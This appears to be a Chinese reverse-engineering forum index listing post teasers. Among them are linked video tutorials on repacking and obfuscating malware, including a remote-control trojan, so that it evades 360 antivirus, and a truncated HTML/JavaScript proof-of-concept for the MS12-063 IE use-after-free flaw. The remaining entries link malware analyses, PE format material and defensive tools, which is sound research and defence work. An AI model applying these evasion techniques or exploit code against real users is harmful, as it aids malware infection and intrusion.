逆向破解
发几个最近自己原创的逆向改壳加花免杀360视频
发几个最近自己原创的逆向改壳加花免杀360视频要变天了 没办法啊 也许有人在某某论坛看过了 有思路者一起交流。。。。。超详细改壳免杀360 http://pan.baidu.com/share/link?shareid=159759&uk=168571591鸽子改壳加花逆向免杀360http://pan.baidu.com/share/link?shareid=159760&uk=168571591壳头花逆
逆向追踪远控作者
国外大牛继续发力,人肉追踪了PlugX RAT的作者.主要利用Microsoft Office的漏洞CVE-2012-0158,当用户打开这些攻击邮件附件时,就会因为CVE-2012-0158漏洞中招并下载三个文件:Nvidia执行文件NvSmart.exe,DLL文件 (NvSmartMax.dll) 和一个二进制文件(boot.ldr).赛门铁克也曾经分析报道过:http://www.syma
PE格式示意图
PE文件格式图,网上很多,仅供参考。
CVC病毒技术研究精华
CVC病毒技术公社是数年前活跃的国内病毒技术研究组织,现在基本销声匿迹,但当时关于病毒技术的讨论仍然很有学习价值。具体可以参考附件。
最新MS12-063 POC
最新的MS12-063 IE 漏洞的poc样本,由内存释放引发的use after free漏洞,有兴趣的可以研究。poc.htm<html><body><SCRIPT>var times = 0;var jifud = new Array();while(times < 100) {jifud = window.document.createElement("img");jifud = "a";times++;}</SCRIPT> xxxx <script>docum
Duqu病毒分析报告
著名的Duqu工业病毒,这是赛门铁克发布的一篇报告,虽不算最早,但也比较权威,值得学习!w32_duqu_the_precursor_to_the_next_stuxnet.swf
The Evolution of TDL
TDL是一款技术含量比较高的BootKit病毒,附件内是来自国外的一份分析报告,值得学习!The_Evolution_of_TDL.swf
Emet软件保护研究
什么是Emet: EMET(增强减灾体验工具)是Enhanced Mitigation Experience Toolkit的缩写。该软件是微软为应对互联网中层出不穷的漏洞而推出的一款安全工具。它通过数据执行保护(DEP)、结构化异常处理覆盖保护(SEHOP)和随机地址空间分配(ASLR)等技术使用户即使在未安装补丁的情况下也可以免
httpdx 1.5.4 Remote HTTP Server Denial of Service漏洞分析
httpdx_Remote_HTTP_Server_Denial_of_Service.swf
金山火眼在线行为分析系统
https://fireeye.ijinshan.com/金山公司研发的在线行为分析系统。把待分析的程序上传上去,可以进行行为分析检测。有需要分析的朋友可以把待分析的程序加密发过来,我可以帮忙分析。
